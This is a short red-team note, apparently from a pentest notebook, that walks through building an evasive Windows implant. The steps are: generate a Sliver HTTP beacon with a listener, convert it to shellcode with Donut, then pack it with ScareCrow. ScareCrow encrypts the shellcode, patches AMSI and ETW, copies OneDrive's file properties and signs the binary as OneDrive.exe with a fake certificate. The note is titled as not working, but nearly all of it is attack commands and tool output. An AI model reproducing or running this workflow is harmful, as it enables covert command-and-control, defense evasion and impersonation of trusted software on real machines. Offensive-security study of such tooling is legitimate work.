Sliver + ScareCrow (Does not Work)
Create beacon
sliver > generate beacon --http 192.168.1.109:1234 --os windows
[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 17s
[*] Implant saved to /home/Intrusionz3r0/Documents/Sliver/ARBITRARY_ATHLETICS.exe
sliver > http --lhost 192.168.1.109 --lport 1234
[*] Starting HTTP :1234 listener ...
[*] Successfully started job #2
sliver > Generating the shellcode
❯ ~/Documents/Tools/donut/donut -i /home/Intrusionz3r0/Documents/Sliver/ARBITRARY_ATHLETICS.exe -b 1 -e 3 --output rev.bin
[ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "/home/Intrusionz3r0/Documents/Sliver/ARBITRARY_ATHLETICS.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : none
[ PE Headers : overwrite
[ Shellcode : "rev.bin"
[ Exit : ThreadGenerating the payload
❯ ./ScareCrow -I ../rev.bin --domain microsoft.com
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2722 milliseconds
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneDrive's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneDrive.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneDrive.exe: f1512b32db1144e5f4d6dbdeaac303ff6d98ad3d038cc0f2fc816e5e4cf70241Last updated